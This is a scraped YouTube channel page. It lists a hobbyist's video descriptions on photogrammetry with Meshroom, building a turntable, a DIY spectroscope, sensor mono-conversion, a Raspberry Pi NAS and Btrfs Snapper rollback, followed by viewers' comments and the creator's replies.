- 10
- 23 567
mpr
Приєднався 24 чер 2023
Here's how the 'docker' group is insecure
This is a very brief video illustrating how the docker group gives full root access to the host system (if you're using the default installation, i.e. not rootless docker).
Переглядів: 77
Відео
Meshroom: Initial Pipeline, CCTags, using a Turntable and Known Camera Positions
Переглядів 1,1 тис.Місяць тому
In this video we look at some aspects of using Meshroom to do 3D-Reconstructions. We start by discussing the first part of the pipeline, up to the StructureFromMotion node. We may discuss the remaining nodes in a future video. Then we look at automatically scaling our model with CCTags, followed by what changes when we use a turntable. Finally, we look into using known camera positions to make ...
Building a small, simple Turntable (for 3D-Reconstructions)
Переглядів 5052 місяці тому
In this video we build a small and simple turntable. The turntable can be used by itself or as part of the big machine that I built for automating 3D reconstructions (see the previous video ua-cam.com/video/CPj8vRa3ZhE/v-deo.html for an overview of the project). If you want to build this yourself then you can find stl files (for the 3d-printed parts) and the code that I'm using at github.com/mp...
Let's do some 3D Reconstruction: Intro and Image Acquisition
Переглядів 1842 місяці тому
This is the first video of a mini-series about 3D Reconstructions. In this video we cover: 00:00 Intro / Project Description 02:35 Taking Photos Manually 04:57 Using a Rotating Chair 06:07 Extracting Frames from a Video 09:17 Using a Turntable 10:39 Automating the Entire Process (with a Machine) 12:20 A better Reconstruction with more Photos 13:06 Improvements by Drawing a Random Pattern 14:18 ...
Building an accurate DIY Spectroscope
Переглядів 11 тис.5 місяців тому
In this video we use a camera that's capable of saving RAW pictures and an analogue / pocket spectroscope to create a DIY digital spectroscope. On the way we talk about many topics that affect our results, including color filter arrays, lenses, etc ... Our spectroscope is limited to the visible range (even a bit less, to roughly 425nm to 675nm) and it's not going to be as accurate as commercial...
A Brief History of Light - From Ancient Greece to the Middle Ages
Переглядів 2157 місяців тому
This is the first video in a mini-series about the history of human ideas about the nature of light. It's a huge topic but we'll try to keep it brief and concise. This first part covers the time from the Ancient Greeks up to the Middle Ages. The next videos will continue from the 16th century up to the 20th century. In the future we may look at some topics in more detail. The English translatio...
Mono-Conversion of a Canon 350D
Переглядів 2,1 тис.8 місяців тому
In this video we convert a Canon 350D to monochrome. We disassemble the camera all the way down to the sensor, remove the top layer of the sensor (which includes the color filter array) and discuss auto focus calibration. We'll remove the top layer of the sensor manually, by scratching it off. See ua-cam.com/video/y39UKU7niRE/v-deo.html&pp=ygUYbGVzIGxhYiBsYXNlciBtb25vY2hyb21l for a video by @Le...
Building a Case for our NAS
Переглядів 489 місяців тому
Now that we've finished our network-attached storage solution, let's build a case for it. The codes for controlling the Raspberry Pi can be found under github.com/mpr-projects/RPi-NAS. A detailed guide for setting up the NAS can be found under mpr-projects.com/index.php/2023/11/13/building-a-raspberry-pi-nas-with-data-redundancy-part-1-overview/. This series of posts includes both the actual st...
Raspberry Pi Network Attached Storage with Data Redundancy
Переглядів 1289 місяців тому
In this video we install and configure Greyhole on a Raspberry Pi. The video is part of a series of posts about setting up a Network-Attached Storage solution (NAS) with data redundancy. It is intended for home use with a limited number of users. The entire series of posts can be found under mpr-projects.com/index.php/2023/11/13/building-a-raspberry-pi-nas-with-data-redundancy-part-1-overview/ ...
Snapper Rollback on Arch Linux
Переглядів 9 тис.Рік тому
Installing BTRFS with Snapper and Snapper Rollback allows for safe undoing of unwanted changes. In this video I show a basic setup that doesn't break when rolling back after a kernel update. Useful links: - wiki.archlinux.org/title/Installation_guide - wiki.archlinux.org/title/Btrfs - wiki.archlinux.org/title/Snapper
Best video I saw on mesh room. Thank you for making this video 😁❤... Can you please give me some more information on exactly how you made your own nodes or provide some reference material to figure it out.
You are the best!. This video have more quality than a lot of paid courses, you gave me the motivation to keep studing meshroom. If you have a donation link I would love to contribute PS: I use a closed white cardboard box with 2 lights and it seems that free me from a lot of problems with the background that you describe in the video
This is a great tutorial, thanks so much for sharing. So much info on meshroom here that's undocumented elsewhere. Would you mind sharing your custom nodes? Just to jumpstart someone who's trying to do something similar
If possible can you please make a continuation of this video to enable booting into snapshots? It will be very helpful in my case..Thank you
After many tutorials, this worked for me, and Im thankful this is very fast and straight forward with explanations..
Thank you! Best meshroom video I've seen. Epic work!
I gotta be honest, i was thinking… yeh this is a nightmare but might be able to have a go.. right up to the point of scratching the face of the sensor with the end of tweezers!!!! 😮😮😮 now I’m done, not for me but an interesting video
you could also add to the machine learning a parameter of the temperature lamp - with a penalty for how far from 2700 it is , you are consistently getting red-low, green high. it feels like a slight tweak of the "known" temperature you could get a better result. if you do that you could also add in the other lamps - 'please find 3 temperatures and 3 spectra, so that these all match'
I found a lot video to explain how to use btrfs on archlinux , your video is the best , thanks.
Can't get CCTags to work properly, the FeatureExtraction node behaves very oddly for me. When enabling cctag3 or cctag4, the node crashes on compute (nothing in the log, "aliceVision_featureExtraction has stopped working" from Windows) and no features are extracted. This only happens when I try to load more than 4 images. With 4 images it works fine and detects the tags, but as soon as I put in one more image it crashes on compute. Am I missing something obvious?
If it crashes like that then there's probably an issue in the specific binary of Meshroom that you're using. It also took me some time (an eternity) to get it set up so that everything works. I had to build it in a Docker image that uses Debian 12.6 as base image, I couldn't get it to run on reliably on Arch Linux, Ubuntu 22.04 or Ubuntu 24.04. If you were on linux then you could use the Dockerfile that I linked to in the video description. Unfortunately I can't help you with Windows, haven't used that in a long time ...
@@_mpr_ Linux it is then, time to set up a Debian VM... and I should create an issue on GitHub. In the meantime I'm using MeshroomCL for datasets that need CCTags, runs considerably slower but at least it doesn't crash! Thank you for the fantastic tutorial by the way, great intro to photogrammetry with Meshroom. You answered all the questions I had in one concise video. Grüß Gott aus Norddeutschland!
Awesome!
Great information, thank you so much for making this! Most tutorials on Meshroom I found are not very detailed, so apart reading the manual your video is the best thing to finally start understanding the advanced settings!
Thank you! That's what I was going for :)
Do you have Soldworks files inside of STL. I am planning to make bigger one
Hey, no I'm sorry, I didn't use Solidworks in the design (I went with the open-source program FreeCAD).
Excellent work thanks 👍🏻 Please do more for motion control stuff
Camera technician here that has changed probably 1000 sensors due to bonding issues. Actually I still have many sensors left. I had seen the progression from monochrome to color. First they used 3 ccd systems in an effort to retain the most possible light using very expensive prisms. Then the race to find the very best single chip and filtration system began. Every manufacturer had their own way and despite being a Canon agent for a while I never had to change a canon ccd. But I had endless requests from enthusiasts who wanted the color filter removed for either night vision or artistic perfect monochrome photography. Since I had already suffered with enough health damage inhaling chemicals or lead fumes from soldering I must admit that I failed at removing filters. Others have mentioned that you can actually still find true monochrome sensors but make sure the sellers actually know what they sell in our drop ship world.
Hey, thanks for sharing your story about the progression of sensors, I find the history of photography/light so interesting!
Hats off for this extensive research. Throughout my long career I have met endless professors, doctors and engineers. Most have one thing in common: Create the very best instrument a human can build. This is the reason they invented the word "Philosophy". For a while I was in the Fuji camp and I had my followers that just loved Fuji colors. Then I did some travels. Cultural interpretations of colours can be wider than the ones in music. Color temperature and how humans interprete their own sun as the ideal light. Let alone the fact that sunlight created vitamin D, a fact even the very best researcher can not escape. Create your own waveform and then find the best scientists will never agree with even the weakest of artist. Who would ever admit that they are partially color blind? Well our brains can not only heal, they can also interpolate. I just love to find the new discoveries from the newly discovered sub particles and how the photons is changing research all the time.
If any custom PCBs or 3D printing (for different material needs) can help for future projects? We're open to sponsor! (PCBWay zoey)
Muito obrigado, deu certo.
5:30 one solution could be using a tube as a separator for the inner tracks of the bearings, and not using "inner" nuts. So when you tighten the upper nut, it will be compressing nut-bearing-spacer-bearing-nut. Just make sure the spacer tube is a tad longer than the space between bearings in the 3d printed part.
hey, that's a good idea! I'll do that for version 2 ;)
punks would call this overly nerdy.
Nice video! Thanks for sharing your work! I have been wondering for a long time whether or not photogrammetry for medium/small size objects was possible. Inputing manualy the position of the pictures sounds like a good idea to improve accuracy, 😰 modifying the code of meshroom doesnt sounds so fun to me. Could you explain how you did it, or share "your version" of meshroom?
Hey, thank you! I'm planning to spend some time next week to try and set up Meshroom in Docker or Linux containers. Right now my own setup is a bit messy because I'm using the self-compiled version for importing images but a binary for the rest (because right now the GUI and some other functions don't seem to work properly on more up-to-date versions of Linux). If I get it to run smoothly then I'll make the container available and I post a blog entry or a video about it.
Hey, I finally got Meshroom/AliceVision to compile in Docker. If you use Linux then try my Dockerfile: github.com/mpr-projects/Meshroom_Docker (I talk also about it in the latest video).
My son did this using a chopstick.
excellent explantation💥💥💥💥💥💥💥💥💥💯💯💯💯💯💯💜💜💜💜
I've seen people using a green screen/table and automatically delete the background of the image. IIRC there is a matte spray you can use that will wash off of shiny objects.
yes, the spray is definitely something I want to try, mostly for transparent objects like glass; I've done some tests with a green screen but it did leave a green shimmer on the reconstructed texture (even though the green screen was in the background, not that close to the object; when I put it directly underneath the object then the shimmer is quite strong), but I'll do some more tests soon
@@_mpr_ I think I've seen hairspray used as a fogger
Looks like good progress!
@8:00 I think you are right that THAT is what happens when you stop down the lens. But the graph you use to explain it seems to not make the point very clearly. The spectroscope creates an *angular* separation between the spectral wavelenghts. The other OP's through the lens and apperture are simply not available for these angles. @9:00 The (main) issue, i think, is not that the green light has an other origin in the source, but that it has a specific angle.
whats the point of the .btrfsroot folder, you also didnt put the right sub volume id for it
Snapper is just a wrapper as far as I know. We can rollback directly using btrfs subvolume commands
I tried this with a Nikon D5100 a few years ago and failed miserably. The glass covering the sensor is glued on so strongly there was no way to remove it without shattering the whole thing. I even tried heating it to uncomfortable levels but the glue never budged. After hours of trying the glass shattered and the golden pins inside also got ripped.
Sony had probably made the most chips and probably the hardest to remove filter. Heat them a bit and the bonding fails. I changed 1000's because of heat failures.
Fantastic project! Thank you for sharing it. Ive played with using a webcam (IR filter removed), using Theremino Spectrometer V3.1. The setup was good enough for testing UV pass through various lenses down to about 365 nm. My only disappointment was that the setup is too low of a resolution for much beyond pass/fail testing. I cant wait to make and try out your project for myself!
Monochrome camera with no Bayer filter layer is actually easy to get. There's two options i can think of, one is a Raspberry Pi module by Arducam and another an industrial naked USB module from a Chinese supplier, UVC webcam compatible. Neither is actually expensive.
Jesus....this is...BEYOND insanely amazingly rigorous. And now, I think I'm going to just go buy a spectrometer off the shelf. lol
Most white surfaces (paper, paint, ...) contain fluorescent additives. Huge effect if there's any uv...
I've read from multiple sources that white Teflon is the ideal cheap and available reflective material for a reflective surface from UV through IR for reasonably accurate UV and IR.
@@jimzielinski946 yes, white Teflon is the right choice, if possible, a frosted one. I used such a reflector to calibrate the spectrometer for measuring a sun simulator for solar panels.
This is awesome, do you know if the color filtering would affect a version that wants to look at IR side?
hey, yes, this specific setup is not really suitable for measuring IR radiation because the IR filter in your camera would block most of the IR wavelengths; some of the smaller cheaper camera/lens combinations (e.g. as used for cctv) contain a removable IR filter but when I tested those the results were not as good as with a high-quality camera (although I didn't focus on the IR side ...)
thank you so much
I have the privilege of working with actual multi-thousand-dollar calibration lamps and professional spectrophotometers, and I can say that your approach is very commendable. Every technique you've used (except machine learning and modifying an actual SLR) is something I've also done done at some point. The only thing I would have done differently is making a calculation pipeline from entered calibration lamp color temperature to estimated solar spectrum, so you can drag a slider and see at which color temperature the solar spectrum is most ideal. Furthermore it should be very easy to make a gradient decent function for the dips in the solar spectrum, so you can just click on a dip (say, 486nm) and it will find the exact pixel. For an extra kudos, implement a cubic interpolation curve to get sub-pixel accuracy, which I've done too.
That's great feedback, thank you very much! I'll keep your suggestions in mind for a potential follow up (I was thinking of illustrating why using jpegs is not super accurate, could combine that with some other improvements ...)
Great video, thanks!
If you put the spectrum at 45 degrees, the mosaics are both nicer to work with, and you get way more pixels to waste on smoothing.
You can get the exact temperature of a light bulb by measuring the voltage across it and current through it when taking the photo, and then breaking it open and weighing the filament. Don't ask me for the formula though. But it's a cheap standard derivation if you have good meters and a microgram scale.
Pretty nice video and really nice project. I might give it a try as well. Thanks to Fujirumors btw for making me aware of this video.
You should publish a tutorial paper about this method.
There are some photoresist chemicals that can remove the Bayer layer.
Please give us details. I tried deadly ones only to kill the cip instead.
Take the picture of the spectrum at an angle on the Bayer filter? Fluorescent lights are good as well for calibration. 25:16 glass is terrible for UV. And IR cutoff is a pain as well.
Great suggestions, I like the idea of taking a picture at an angle!
@@_mpr_ you can theoretically get better resolution because... Pythagoras and all that stuff. The cameras I like playing with are the camera modules you can get from China. They'll either be C/CS or M12 mount (that you can actually take off). The IR filters are pretty easy to remove or replace. You can find some very narrow FoV lenses. You can put a piece of diffraction grating right in front of the lens and angle it away from a slit of razor blades in a box. But if you want to stick with raw image data, probably a Pi with a camera module could replace the USB cameras. With a different lens setup you can even turn it into a microscope with a 3d printed tube and a cheap objective.
So I do have a few cheap M12 mount cameras lying around and I used them in my initial tests. Being able to easily remove the IR filter is certainly very useful but I found the quality/resolution of the images to be worse than those of my XT2/4. Also, with cheap lenses like those we do have to worry about distortions and aberrations impacting our results. Another reason for choosing this setup was that I wanted to keep the hardware tinkering to a minimum for this project. There's also one more point for not using jpegs that I didn't mention in the video (because I only thought about it afterwards). And that's that the whitebalancing process used when creating jpegs will impact the accuracy of your results (I'll post something about that once I've tested it thoroughly).
Whitebalancing and de-linearization of intensity values is so inaccurate in cameras, it's not even a joke.
Great work! 🌈🤗
Wow, this is absolutely *_brilliant!_* I’m just blown away by all the work you did to establish the calibration 🤯 I’d imagine that the spectral width of the Fraunhofer lines is well known; can you determine the resolution of your spectrograms from them? (I don’t know how resolution is specified, but assume it’s something like FWHM.) This is really outstanding work, and your explanation of all of it was crystal-clear! Thanks for sharing, good luck on your future projects! (A couple of minutes later… :-) I was thinking a bit more about resolution and how to increase it, and had a maybe-harebrained idea: From camera testing, I’m familiar with the slanted-edge test on the ISO-12233 resolution test target. The idea is that a slightly slanted black-white edge will result in a whole range of pixels with more or less of the white side of the edge falling within them. From this, you can extract a curve that shows the spatial response of the camera’s sensor with sub-pixel resolution. Although I haven’t seen it done in camera imaging, it seems to me that you could extract the point-spread function and then deconvolve (I think that’s what the operation would be, would have to think about it more) that with the camera’s images to get an optimally-sharpened image. I wonder if you could extract similar information and perform similar deconvolution relative to spectral resolution by rotating the grating axis slightly and then looking along the columns of pixels to see what transitions looked like? You wouldn’t have something s clean as a sharp black/white edge to work with, but intuitively it seems like you ought to be able to do something with the Fraunhofer lines to accomplish something like this. (Oh - could you maybe use ML to adjust a deconvolution function until the profiled of the Fraunhofer lines more closely matched their actual structure?) I dunno if anything along these lines would work, and it’s probably waaay more further effort than you’d want to put in on this particular project, but the whole project is very intriguing to me 😁 (I may be all wet here; I should be going to bed so my brain isn’t very sharp and I don’t have time to devote to thinking about it.)
Hey Dave, thanks for your kind words about the video, it was a lot of work and it's great to get feedback like that! I really like your idea about the slanted-edge/slanted-Fraunhofer lines. At first glance I think that could work at some of the very steep and deep Fraunhofer lines. I also think that it will require a lot of careful thinking and testing to see if and how well it works (so many of the great ideas that I've had fell apart when testing them carefully :D ). In any case, I'll put it on my list of future things to test!
Very good work and excellent video!
More stuff man. Liked this vid very much.
Thanks und Grüess us Thun :)
nice video kickoff. I'm excited to see more
Waiting for the comparison between BW mode (picture style) and actual monochrome. Do you see any improvement in resolution/detail?